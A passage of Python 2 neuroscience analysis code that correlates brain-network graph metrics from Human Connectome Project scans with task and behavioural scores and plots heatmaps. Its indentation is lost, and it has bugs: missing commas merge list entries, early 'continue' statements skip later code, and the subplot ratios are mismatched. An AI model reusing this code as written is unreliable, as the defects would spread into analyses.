for s in range(subject_pcs.shape[0]):
perf_edge_scores[s] = pearsonr(flat_matrices[s],perf_edge_corr)[0]
flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
for s in range(subject_pcs.shape[0]):
m = rest_matrices[s]
flat_matrices[s] = m[np.tril_indices(264,-1)]
mod_edge_corr = generate_correlation_map(rest_subject_mods[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
mod_edge_scores = np.zeros((subject_pcs.shape[0]))
for s in range(subject_pcs.shape[0]):
mod_edge_scores[s] = pearsonr(flat_matrices[s],mod_edge_corr)[0]
perf_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(subject_pcs.shape[1]):
perf_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_pcs[fit_mask,i])[0]
perf_wmd_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_wmds.shape[1]):
perf_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_wmds[fit_mask,i])[0]
mod_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(subject_pcs.shape[1]):
mod_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_pcs[fit_mask,i])[0]
mod_wmd_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_wmds.shape[1]):
mod_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_wmds[fit_mask,i])[0]
task_pc = np.zeros(subject_pcs.shape[0])
task_wmd = np.zeros(subject_pcs.shape[0])
for s in range(subject_pcs.shape[0]):
task_pc[s] = nan_pearsonr(subject_pcs[s],perf_pc_corr)[0]
task_wmd[s] = nan_pearsonr(subject_wmds[s],perf_wmd_corr)[0]
rest_pc = np.zeros(subject_pcs.shape[0])
rest_wmd = np.zeros(subject_pcs.shape[0])
for s in range(subject_pcs.shape[0]):
rest_pc[s] = nan_pearsonr(rest_subject_pcs[s],mod_pc_corr)[0]
rest_wmd[s] = nan_pearsonr(rest_subject_wmds[s],mod_wmd_corr)[0]
if use_matrix == True:
pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,mod_edge_scores,perf_edge_scores]).transpose()
neurons = (6,9,6,9,)
elif use_matrix == False:
pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,]).transpose()
neurons = (4,6,4,6,)
train = np.ones(len(pvals)).astype(bool)
train[t] = False
if return_features == True:
return pvals[t]
model = MLPRegressor(solver='lbfgs',hidden_layer_sizes=neurons,alpha=1e-5,random_state=t)
model.fit(pvals[train],task_perf[train])
result = model.predict(pvals[t].reshape(1, -1))[0]
return result
def task_performance(subjects,task):
df = pd.read_csv('/%s/dynamic_mod/S900_Release_Subjects_Demographics.csv'%(homedir))
performance = []
if task == 'WM':
wm_df = pd.DataFrame(np.array([df.Subject.values,df['WM_Task_Acc'].values]).transpose(),columns=['Subject','ACC']).dropna()
for subject in subjects:
temp_df = wm_df[wm_df.Subject==subject]
if len(temp_df) == 0:
performance.append(np.nan)
continue
performance.append(temp_df['ACC'].values[0])
if task == 'RELATIONAL':
for subject in subjects:
try:performance.append(df['Relational_Task_Acc'][df.Subject == subject].values[0])
except: performance.append(np.nan)
if task == 'LANGUAGE':
for subject in subjects:
try:performance.append(np.nanmax([df['Language_Task_Story_Avg_Difficulty_Level'][df.Subject == subject].values[0],df['Language_Task_Math_Avg_Difficulty_Level'][df.Subject == subject].values[0]]))
except: performance.append(np.nan)
if task == 'SOCIAL':
social_df = pd.DataFrame(np.array([df.Subject,df['Social_Task_TOM_Perc_TOM'],df['Social_Task_Random_Perc_Random']]).transpose(),columns=['Subject','ACC_TOM','ACC_RANDOM']).dropna()
for subject in subjects:
temp_df = social_df[social_df.Subject==subject]
if len(temp_df) == 0:
performance.append(np.nan)
continue
performance.append(np.nanmean([temp_df['ACC_RANDOM'].values[0],temp_df['ACC_TOM'].values[0]]))
performance = np.array(performance)
performance[np.where(np.array(subjects).astype(int) == 142626)[0]] = np.nan
return performance
def behavior(subjects):
df = pd.read_csv('/%s/dynamic_mod/S900_Release_Subjects_Demographics.csv'%(homedir))
task_perf = pd.DataFrame(columns=['WM','RELATIONAL','SOCIAL','LANGUAGE'])
for task in task_perf.columns.values:
task_perf[task] = task_performance(df.Subject.values,task)
task_perf['Subject'] =df.Subject.values
# task_perf = task_perf.dropna()
fin = pd.merge(task_perf,df,how='outer',on='Subject')
to_keep = ['MMSE_Score','PicSeq_AgeAdj','CardSort_AgeAdj','Flanker_AgeAdj','PMAT24_A_CR',\
'ReadEng_AgeAdj','PicVocab_AgeAdj','ProcSpeed_AgeAdj','DDisc_AUC_40K','DDisc_AUC_200',\
'SCPT_SEN','SCPT_SPEC','IWRD_TOT','ListSort_AgeAdj',\
'ER40_CR','ER40ANG','ER40FEAR','ER40HAP','ER40NOE','ER40SAD',\
'AngAffect_Unadj','AngHostil_Unadj','AngAggr_Unadj','FearAffect_Unadj','FearSomat_Unadj','Sadness_Unadj',\
'LifeSatisf_Unadj','MeanPurp_Unadj','PosAffect_Unadj','Friendship_Unadj','Loneliness_Unadj',\
'PercHostil_Unadj','PercReject_Unadj','EmotSupp_Unadj','InstruSupp_Unadj'\
'PercStress_Unadj','SelfEff_Unadj','Endurance_AgeAdj','GaitSpeed_Comp','Dexterity_AgeAdj','Strength_AgeAdj',\
'NEOFAC_A','NEOFAC_O','NEOFAC_C','NEOFAC_N','NEOFAC_E','PainInterf_Tscore','PainIntens_RawScore','PainInterf_Tscore','Taste_AgeAdj'\
'Mars_Final','PSQI_Score','VSPLOT_TC']
# to_keep = ['MMSE_Score','PicSeq_AgeAdj','CardSort_AgeAdj','Flanker_AgeAdj','PMAT24_A_CR',\
# 'ReadEng_AgeAdj','PicVocab_AgeAdj','ProcSpeed_AgeAdj','DDisc_AUC_40K','DDisc_AUC_200',\
# 'SCPT_SEN','SCPT_SPEC','IWRD_TOT','ListSort_AgeAdj','VSPLOT_TC',\
# 'ER40_CR','ER40ANG','ER40FEAR','ER40HAP','ER40NOE','ER40SAD']
for s in fin.Subject.values:
if str(int(s)) not in subjects: fin.drop(fin[fin.Subject.values == s].index,axis=0,inplace=True)
assert (np.array(fin.Subject.values) == np.array(subjects).astype(int)).all()
for c in fin.columns:
if c not in to_keep: fin = fin.drop(c,axis=1)
for c in fin.columns:
a = fin[c][np.isnan(fin[c])]
assert len(a[a==True]) == 0
fin[c][np.isnan(fin[c])] = np.nanmean(fin[c])
return fin
def make_heatmap(data,cmap="RdBu_r",dmin=None,dmax=None):
minflag = False
maxflag = False
orig_colors = sns.color_palette(cmap,n_colors=1001)
norm_data = np.array(copy.copy(data))
if dmin != None:
if dmin > np.min(norm_data):norm_data[norm_data<dmin]=dmin
else:
norm_data=np.append(norm_data,dmin)
minflag = True
if dmax != None:
if dmax < np.max(norm_data):norm_data[norm_data>dmax]=dmax
else:
norm_data=np.append(norm_data,dmax)
maxflag = True
if np.nanmin(data) < 0.0: norm_data = norm_data + (np.nanmin(norm_data)*-1)
elif np.nanmin(data) > 0.0: norm_data = norm_data - (np.nanmin(norm_data))
norm_data = norm_data / float(np.nanmax(norm_data))
norm_data = norm_data * 1000
norm_data = norm_data.astype(int)
colors = []
for d in norm_data:
colors.append(orig_colors[d])
if maxflag: colors = colors[:-1]
if minflag: colors = colors[:-1]
return colors
def performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False,use_matrix=True,return_df=False):
try: del pool
except: pass
pool = Pool(multiprocessing.cpu_count()-1)
run_version = 'fz'
# control_com=False
# control_motion=False
# use_matrix = True
tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL']
atlas='power'
loo_columns= ['Task','Predicted Performance','Performance']
loo_df = pd.DataFrame(columns = loo_columns)
pc_df = pd.DataFrame(columns=['Task','Mean Participation Coefficient','Diversity Facilitated Modularity Coefficient'])
wmd_df = pd.DataFrame(columns=['Task','Mean Within-Community-Strength','Locality Facilitated Modularity Coefficient'])
total_subs = np.array([])
for task in tasks:
"""
preprocessing
"""
print task.capitalize()
rest_subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%('REST',atlas,run_version))
rest_results = graph_metrics(rest_subjects,'REST',atlas,run_version=run_version)
rest_subject_pcs = rest_results['subject_pcs'].copy()
rest_matrices = rest_results['matrices']
rest_subject_mods = rest_results['subject_mods']
rest_subject_wmds = rest_results['subject_wmds']
rest_subjects = rest_results['subjects']
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%(task,atlas,run_version))
static_results = graph_metrics(subjects,task,atlas,run_version=run_version)
subject_pcs = static_results['subject_pcs'].copy()
subject_wmds = static_results['subject_wmds']
matrices = static_results['matrices']
subject_mods = static_results['subject_mods']
subject_communities = static_results['subject_communities']
subjects = static_results['subjects']
all_subs = np.intersect1d(rest_subjects,subjects)
rest_idx = []
task_idx = []
for s in all_subs:
rest_idx.append(np.where(rest_subjects == s)[0][0])
task_idx.append(np.where(subjects == s)[0][0])
assert (rest_subjects[rest_idx] == subjects[task_idx]).all()
subjects = all_subs
print len(np.unique(subjects)),len(subjects)
total_subs = np.append(total_subs,subjects.copy())
print len(np.unique(np.array(total_subs).flatten()))
continue
rest_subject_pcs = rest_subject_pcs[rest_idx]
rest_subject_wmds = rest_subject_wmds[rest_idx]
rest_subject_mods = rest_subject_mods[rest_idx]
rest_matrices= rest_matrices[rest_idx]
subject_pcs = subject_pcs[task_idx]
subject_wmds = subject_wmds[task_idx]
subject_mods = subject_mods[task_idx]
matrices = matrices[task_idx]
subject_communities = subject_communities[task_idx]
task_perf = task_performance(np.array(subjects).astype(int),task)
to_delete = np.isnan(task_perf).copy()
to_delete = np.where(to_delete==True)
task_perf = np.delete(task_perf,to_delete)
subjects = np.delete(subjects,to_delete)
if control_motion == True:
subject_motion = []
for subject in subjects:
subject_motion.append(get_sub_motion(subject,task))
assert np.min(subject_motion) > 0.0
subject_motion = np.array(subject_motion)
subject_pcs = np.delete(subject_pcs,to_delete,axis=0)
subject_mods = np.delete(subject_mods,to_delete)
subject_wmds = np.delete(subject_wmds,to_delete,axis=0)
matrices = np.delete(matrices,to_delete,axis=0)
subject_communities = np.delete(subject_communities,to_delete)
rest_subject_pcs = np.delete(rest_subject_pcs,to_delete,axis=0)
rest_subject_wmds = np.delete(rest_subject_wmds,to_delete,axis=0)
rest_subject_mods = np.delete(rest_subject_mods,to_delete,axis=0)
rest_matrices = np.delete(rest_matrices,to_delete,axis=0)
subject_pcs[np.isnan(subject_pcs)] = 0.0
rest_subject_pcs[np.isnan(rest_subject_pcs)] = 0.0
rest_subject_wmds[np.isnan(rest_subject_wmds)] = 0.0
subject_wmds[np.isnan(subject_wmds)] = 0.0
if control_com == True and control_motion == True:
model_vars = np.array([subject_motion,subject_communities]).transpose()
task_perf = sm.GLM(task_perf,sm.add_constant(model_vars)).fit().resid_response
assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
if control_com == True and control_motion == False:
task_perf = sm.GLM(task_perf,sm.add_constant(subject_communities)).fit().resid_response
assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
if control_com == False and control_motion == True:
task_perf = sm.GLM(task_perf,sm.add_constant(subject_motion)).fit().resid_response
assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
assert subject_pcs.shape[0] == len(subjects)
task_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(len(task_pc_corr)):
task_pc_corr[i] = nan_pearsonr(task_perf,subject_pcs[:,i])[0]
task_wmd_corr = np.zeros(subject_pcs.shape[1])
for i in range(len(task_pc_corr)):
task_wmd_corr[i] = nan_pearsonr(task_perf,subject_wmds[:,i])[0]
task_str = np.zeros((len(task_pc_corr))).astype(str)
task_str[:] = task.capitalize()
pc_df = pc_df.append(pd.DataFrame(np.array([task_str,np.nanmean(subject_pcs,axis=0),task_pc_corr]).transpose(),columns=['Task','Mean Participation Coefficient','Diversity Facilitated Performance Coefficient']),ignore_index=True)
wmd_df = wmd_df.append(pd.DataFrame(np.array([task_str,np.nanmean(subject_wmds,axis=0),task_wmd_corr]).transpose(),columns=['Task','Mean Within-Community-Strength','Locality Facilitated Performance Coefficient']),ignore_index=True)
if return_df:
continue
"""
prediction / cross validation
"""
vs = []
for t in range(len(task_perf)):
vs.append([subject_pcs,subject_wmds,subject_mods,rest_subject_pcs,rest_subject_wmds,rest_subject_mods,task_perf,t,matrices,rest_matrices,False,use_matrix])
nodal_prediction = pool.map(super_edge_predict_new,vs)
result = pearsonr(np.array(nodal_prediction).reshape(-1),task_perf)
print 'Prediction of Performance: ', result
sys.stdout.flush()
loo_array = []
for i in range(len(nodal_prediction)):
loo_array.append([task,nodal_prediction[i],task_perf[i]])
loo_df = pd.concat([loo_df,pd.DataFrame(loo_array,columns=loo_columns)],axis=0)
# plot_results(loo_df,'Predicted Performance','Performance','/home/despoB/mb3152/dynamic_mod/figures/Predicted_Performance_%s_%s_%s.pdf'%(run_version,control_motion,use_matrix))
if return_df:return pc_df,wmd_df
def performance_across_traits(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False):
try: del pool
except: pass
pool = Pool(multiprocessing.cpu_count()-1)
atlas = 'power'
run_version = 'fz'
control_com=False
control_motion=False
tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL']
project='hcp'
atlas='power'
behavior_df = pd.DataFrame(columns=['Task','Behavioral Measure','Prediction Accuracy','p'])
prediction_df = pd.DataFrame(columns=['Task','Behavioral Measure','Prediction Accuracy','p'])
for task in tasks:
"""
preprocessing
"""
print task.capitalize()
rest_subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%('REST',atlas,run_version))
rest_results = graph_metrics(rest_subjects,'REST',atlas,run_version=run_version)
rest_subject_pcs = rest_results['subject_pcs'].copy()
rest_matrices = rest_results['matrices']
rest_subject_mods = rest_results['subject_mods']
rest_subject_wmds = rest_results['subject_wmds']
rest_subjects = rest_results['subjects']
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%(task,atlas,run_version))
static_results = graph_metrics(subjects,task,atlas,run_version=run_version)
subject_pcs = static_results['subject_pcs'].copy()
subject_wmds = static_results['subject_wmds']
matrices = static_results['matrices']
subject_mods = static_results['subject_mods']
subject_communities = static_results['subject_communities']
subjects = static_results['subjects']
all_subs = np.intersect1d(rest_subjects,subjects)
rest_idx = []
task_idx = []
for s in all_subs:
rest_idx.append(np.where(rest_subjects == s)[0][0])
task_idx.append(np.where(subjects == s)[0][0])
assert (rest_subjects[rest_idx] == subjects[task_idx]).all()
subjects = all_subs
rest_subject_pcs = rest_subject_pcs[rest_idx]
rest_subject_wmds = rest_subject_wmds[rest_idx]
rest_subject_mods = rest_subject_mods[rest_idx]
rest_matrices= rest_matrices[rest_idx]
subject_pcs = subject_pcs[task_idx]
subject_wmds = subject_wmds[task_idx]
subject_mods = subject_mods[task_idx]
matrices = matrices[task_idx]
subject_communities = subject_communities[task_idx]
task_perf = task_performance(np.array(subjects).astype(int),task)
to_delete = np.isnan(task_perf).copy()
to_delete = np.where(to_delete==True)
task_perf = np.delete(task_perf,to_delete)
subjects = np.delete(subjects,to_delete)
if control_motion == True:
subject_motion = []
for subject in subjects:
subject_motion.append(get_sub_motion(subject,task))
assert np.min(subject_motion) > 0.0
subject_motion = np.array(subject_motion)
subject_pcs = np.delete(subject_pcs,to_delete,axis=0)
subject_mods = np.delete(subject_mods,to_delete)
subject_wmds = np.delete(subject_wmds,to_delete,axis=0)
matrices = np.delete(matrices,to_delete,axis=0)
subject_communities = np.delete(subject_communities,to_delete)
rest_subject_pcs = np.delete(rest_subject_pcs,to_delete,axis=0)
rest_subject_wmds = np.delete(rest_subject_wmds,to_delete,axis=0)
rest_subject_mods = np.delete(rest_subject_mods,to_delete,axis=0)
rest_matrices = np.delete(rest_matrices,to_delete,axis=0)
subject_pcs[np.isnan(subject_pcs)] = 0.0
rest_subject_pcs[np.isnan(rest_subject_pcs)] = 0.0
subject_wmds[np.isnan(subject_wmds)] = 0.0
if control_com == True and control_motion == True:
model_vars = np.array([subject_motion,subject_communities]).transpose()
task_perf = sm.GLM(task_perf,sm.add_constant(model_vars)).fit().resid_response
assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
if control_com == True and control_motion == False:
task_perf = sm.GLM(task_perf,sm.add_constant(subject_communities)).fit().resid_response
assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
if control_com == False and control_motion == True:
task_perf = sm.GLM(task_perf,sm.add_constant(subject_motion)).fit().resid_response
assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
assert subject_pcs.shape[0] == len(subjects)
"""
generalize features to behavioral measures
"""
fin = behavior(subjects)
continue
translation = {'Loneliness_Unadj': 'Lonelisness','PercReject_Unadj':'Percieved Rejection','AngHostil_Unadj':'Hostility','Sadness_Unadj':'Sadness','PercHostil_Unadj':'Percieved Hostility','NEOFAC_N':'Neuroticism',\
'FearAffect_Unadj':'Fear','AngAggr_Unadj':'Agressive Anger','PainInterf_Tscore':'Pain Interferes With Daily Life','Strength_AgeAdj':'Physical Strength','FearSomat_Unadj':'Somatic Fear','PSQI_Score':'Poor Sleep',\
'SCPT_SPEC':'Sustained Attention Specificity','SCPT_SEN':'Sustained Attention Sensativity','ER40HAP':'Emotion, Happy Identifications','DDisc_AUC_200':'Delay Discounting:$200',\
'GaitSpeed_Comp':'Gait Speed','DDisc_AUC_40K':'Delay Discounting: $40,000','ER40NOE':'Emotion, Neutral Identifications','ER40ANG':'Emotion, Angry Identifications',\
'ER40FEAR':'Emotion, Fearful Identifications','ER40SAD':'Emotion, Sad Identifications','ER40_CR':'Emotion Recognition','MMSE_Score':'Mini Mental Status Exam','NEOFAC_O':'Openness','IWRD_TOT':'Verbal Memory','PMAT24_A_CR':'Penn Matrix','NEOFAC_C':'Conscientiousness',\
'NEOFAC_A':'Agreeableness','Flanker_AgeAdj':'Flanker Task','CardSort_AgeAdj':'Card Sorting Task','NEOFAC_E':'Extraversion','Dexterity_AgeAdj':'Dexterity','Endurance_AgeAdj':'Endurance','ReadEng_AgeAdj':'Oral Reading Recognition',\
'PicVocab_AgeAdj':'Picture Vocabulary','ProcSpeed_AgeAdj':'Processing Speed','SelfEff_Unadj':'Percieved Stress','PosAffect_Unadj':'Positive Affect','MeanPurp_Unadj':'Meaning and Purpose','Friendship_Unadj':'Friendship',\
'PicSeq_AgeAdj':'Picture Sequence Memory','LifeSatisf_Unadj':'Life Satisfaction','EmotSupp_Unadj':'Emotional Support','ListSort_AgeAdj':'Working Memory','VSPLOT_TC':'Spatial','AngAffect_Unadj':'Anger, Affect'}
vs = []
for t in range(len(task_perf)):
vs.append([subject_pcs,subject_wmds,subject_mods,rest_subject_pcs,rest_subject_wmds,rest_subject_mods,task_perf,t,matrices,rest_matrices,True,True])
task_model_results = pool.map(super_edge_predict_new,vs)
task_model = []
for idx in range(len(task_model_results)):
task_model.append(task_model_results[idx][:-1])
task_model = np.array(task_model)
for i in range(fin.shape[1]):
behav_perf = fin[fin.columns.values[i]]
vs = []
for t in range(len(task_perf)):
vs.append([subject_pcs,subject_wmds,subject_mods,rest_subject_pcs,rest_subject_wmds,rest_subject_mods,behav_perf,t,matrices,rest_matrices,True,True])
behav_model_results = pool.map(super_edge_predict_new,vs)
behav_model = []
behav_prediction = []
for idx in range(len(behav_model_results)):
behav_model.append(behav_model_results[idx][:-1])
behav_prediction.append(behav_model_results[idx][-1])
behav_model = np.array(behav_model)
behav_prediction = np.array(behav_prediction)
fits = []
pvals = []
for feat in range(behav_model.shape[2]):
fits.append(pearsonr(np.array(behav_model)[:,0,feat],np.array(task_model)[:,0,feat])[0])
pvals.append(pearsonr(np.array(behav_model)[:,0,feat],np.array(task_model)[:,0,feat])[1])
behavior_df = behavior_df.append(pd.DataFrame(np.array([task,translation[fin.columns.values[i]],np.mean(fits[:-2]),np.mean(pvals[:-2])]).reshape(1,4),columns=['Task','Behavioral Measure','Prediction Accuracy','p']),ignore_index=True)
result,p = pearsonr(behav_prediction,behav_perf)
prediction_df = prediction_df.append(pd.DataFrame(np.array([task,translation[fin.columns.values[i]],result,p]).reshape(1,4),columns=['Task','Behavioral Measure','Prediction Accuracy','p']),ignore_index=True)
behavior_df.to_csv('/home/despoB/mb3152/dynamic_mod/feature_corr.csv')
prediction_df.to_csv('/home/despoB/mb3152/dynamic_mod/feature_behav_predict.csv')
# plot(behavior_df,savestr,colormap='coolwarm')
# plot(prediction_df,savestr,colormap='coolwarm')
# tasks = ['LANGUAGE','RELATIONAL','SOCIAL','WM']
# m = np.zeros((4,4))
# for i,t1 in enumerate(tasks):
# for j,t2 in enumerate(tasks):
# m[i,j] = pearsonr(df['Prediction Accuracy'][df.Task==t1],df['Prediction Accuracy'][df.Task==t2])[0]
# m[j,i] = pearsonr(df['Prediction Accuracy'][df.Task==t1],df['Prediction Accuracy'][df.Task==t2])[0]
# tasks = ['Language','Relational','Social','Working Memory']
# np.fill_diagonal(m,np.nan)
# sns.heatmap(m)
# sns.plt.xticks(range(4),tasks,rotation=90)
# tasks.reverse()
# sns.plt.yticks(range(4),tasks,rotation=360)
# sns.plt.tight_layout()
# sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/feature_corr_corr.pdf')
# sns.plt.show()
def nn_workflow_figure():
run_version = 'fz'
control_com=False
control_motion=False
use_matrix = True
atlas='power'
loo_columns= ['Task','Predicted Performance','Performance']
loo_df = pd.DataFrame(columns = loo_columns)
pc_df = pd.DataFrame(columns=['Task','Mean Participation Coefficient','Diversity Facilitated Modularity Coefficient'])
wmd_df = pd.DataFrame(columns=['Task','Mean Within-Community-Strength','Locality Facilitated Modularity Coefficient'])
total_subs = np.array([])
task = 'WM'
"""
preprocessing
"""
print task.capitalize()
rest_subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%('REST',atlas,run_version))
rest_results = graph_metrics(rest_subjects,'REST',atlas,run_version=run_version)
rest_subject_pcs = rest_results['subject_pcs'].copy()
rest_matrices = rest_results['matrices']
rest_subject_mods = rest_results['subject_mods']
rest_subject_wmds = rest_results['subject_wmds']
rest_subjects = rest_results['subjects']
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%(task,atlas,run_version))
static_results = graph_metrics(subjects,task,atlas,run_version=run_version)
subject_pcs = static_results['subject_pcs'].copy()
subject_wmds = static_results['subject_wmds']
matrices = static_results['matrices']
subject_mods = static_results['subject_mods']
subject_communities = static_results['subject_communities']
subjects = static_results['subjects']
all_subs = np.intersect1d(rest_subjects,subjects)
rest_idx = []
task_idx = []
for s in all_subs:
rest_idx.append(np.where(rest_subjects == s)[0][0])
task_idx.append(np.where(subjects == s)[0][0])
assert (rest_subjects[rest_idx] == subjects[task_idx]).all()
subjects = all_subs
print len(np.unique(subjects)),len(subjects)
total_subs = np.append(total_subs,subjects.copy())
print len(np.unique(np.array(total_subs).flatten()))
rest_subject_pcs = rest_subject_pcs[rest_idx]
rest_subject_wmds = rest_subject_wmds[rest_idx]
rest_subject_mods = rest_subject_mods[rest_idx]
rest_matrices= rest_matrices[rest_idx]
subject_pcs = subject_pcs[task_idx]
subject_wmds = subject_wmds[task_idx]
subject_mods = subject_mods[task_idx]
matrices = matrices[task_idx]
subject_communities = subject_communities[task_idx]
task_perf = task_performance(np.array(subjects).astype(int),task)
to_delete = np.isnan(task_perf).copy()
to_delete = np.where(to_delete==True)
task_perf = np.delete(task_perf,to_delete)
subjects = np.delete(subjects,to_delete)
if control_motion == True:
subject_motion = []
for subject in subjects:
subject_motion.append(get_sub_motion(subject,task))
assert np.min(subject_motion) > 0.0
subject_motion = np.array(subject_motion)
subject_pcs = np.delete(subject_pcs,to_delete,axis=0)
subject_mods = np.delete(subject_mods,to_delete)
subject_wmds = np.delete(subject_wmds,to_delete,axis=0)
matrices = np.delete(matrices,to_delete,axis=0)
subject_communities = np.delete(subject_communities,to_delete)
rest_subject_pcs = np.delete(rest_subject_pcs,to_delete,axis=0)
rest_subject_wmds = np.delete(rest_subject_wmds,to_delete,axis=0)
rest_subject_mods = np.delete(rest_subject_mods,to_delete,axis=0)
rest_matrices = np.delete(rest_matrices,to_delete,axis=0)
subject_pcs[np.isnan(subject_pcs)] = 0.0
rest_subject_pcs[np.isnan(rest_subject_pcs)] = 0.0
rest_subject_wmds[np.isnan(rest_subject_wmds)] = 0.0
subject_wmds[np.isnan(subject_wmds)] = 0.0
if control_com == True and control_motion == True:
model_vars = np.array([subject_motion,subject_communities]).transpose()
task_perf = sm.GLM(task_perf,sm.add_constant(model_vars)).fit().resid_response
assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
if control_com == True and control_motion == False:
task_perf = sm.GLM(task_perf,sm.add_constant(subject_communities)).fit().resid_response
assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
if control_com == False and control_motion == True:
task_perf = sm.GLM(task_perf,sm.add_constant(subject_motion)).fit().resid_response
assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
assert subject_pcs.shape[0] == len(subjects)
task_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(len(task_pc_corr)):
task_pc_corr[i] = nan_pearsonr(task_perf,subject_pcs[:,i])[0]
task_mod_corr = np.zeros(subject_pcs.shape[1])
for i in range(len(task_pc_corr)):
task_mod_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
task_wmd_corr = np.zeros(subject_pcs.shape[1])
for i in range(len(task_pc_corr)):
task_wmd_corr[i] = nan_pearsonr(task_perf,subject_wmds[:,i])[0]
task_str = np.zeros((len(task_pc_corr))).astype(str)
task_str[:] = task.capitalize()
task_pc = np.zeros(subject_pcs.shape[0])
for s in range(subject_pcs.shape[0]):
task_pc[s] = nan_pearsonr(subject_pcs[s],task_pc_corr)[0]
"""
make pc value array,modularity array, and coefficeints
pick linearly from lowest to stronest coeff
"""
sns.set(style='white',context="paper",font='Helvetica')
plot_pc_coef_values = subject_pcs[np.argsort(subject_mods)[np.linspace(0,subject_mods.shape[0]-1,30).astype(int)]][:,np.argsort(task_mod_corr)[np.linspace(0,task_mod_corr.shape[0]-1,10).astype(int)]].transpose()
plot_task_perf = subject_mods[np.argsort(subject_mods)[np.linspace(0,subject_mods.shape[0]-1,30).astype(int)]]
# sns.heatmap([plot_task_perf,plot_task_perf],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),ax=axes[1],cbar=False)
arr1 = plot_pc_coef_values
arr2 = [plot_task_perf,]
fig, axes = plt.subplots(2, 2,gridspec_kw={'height_ratios': [10,1,10,1], 'width_ratios': [10, .5,], 'wspace': 0.25}, sharex='col')
# h1=sns.heatmap(arr1, ax=axes[0][0], cbar_ax=axes[0][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
h1=sns.heatmap(arr1, ax=axes[0][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
h1.set_xlabel("subjects' participation coefficients")
h1.set_ylabel('nodes')
h1.set_yticklabels(h1.get_yticklabels(),rotation=360)
h1.set_xticks([],[])
# h2=sns.heatmap(arr2, ax=axes[1][0], cbar_ax=axes[1][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
h2=sns.heatmap(arr2, ax=axes[1][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
h2.set_xlabel("subjects' modularity")
h2.set_yticks([],[])
h2.set_xticks([],[])
# plt.savefig('task_perf_corr_exp.pdf')
plot_coefs = task_mod_corr[np.argsort(task_mod_corr)[np.linspace(0,task_mod_corr.shape[0]-1,10).astype(int)]]
h3= sns.heatmap(plot_coefs.reshape(10,1),annot=True, fmt='.2f',ax=axes[0][1],cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True))
# h3.set_xlabel("subjects' participation coefficients")
h3.set_ylabel('diversity facilitated\nmodularity coefficient')
h3.set_yticklabels(h1.get_yticklabels(),rotation=360)
h3.set_xticks([],[])
axes[1][1].set_visible(False)
plt.savefig('pc_mod_corr_exp.pdf')
plt.show()
"""
make pc value array,performance array, and coefficeints
pick linearly from lowest to stronest coeff
"""
sns.set(style='white',context="paper",font='Helvetica')
plot_pc_coef_values = subject_pcs[np.argsort(task_perf)[np.linspace(0,task_perf.shape[0]-1,30).astype(int)]][:,np.argsort(task_pc_corr)[np.linspace(0,task_pc_corr.shape[0]-1,10).astype(int)]].transpose()
plot_task_perf = task_perf[np.argsort(task_perf)[np.linspace(0,task_perf.shape[0]-1,30).astype(int)]]
# sns.heatmap([plot_task_perf,plot_task_perf],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),ax=axes[1],cbar=False)
arr1 = plot_pc_coef_values
arr2 = [plot_task_perf,]
fig, axes = plt.subplots(2, 2,gridspec_kw={'height_ratios': [10,1,10,1], 'width_ratios': [10, .5,], 'wspace': 0.25}, sharex='col')
# h1=sns.heatmap(arr1, ax=axes[0][0], cbar_ax=axes[0][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
h1=sns.heatmap(arr1, ax=axes[0][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
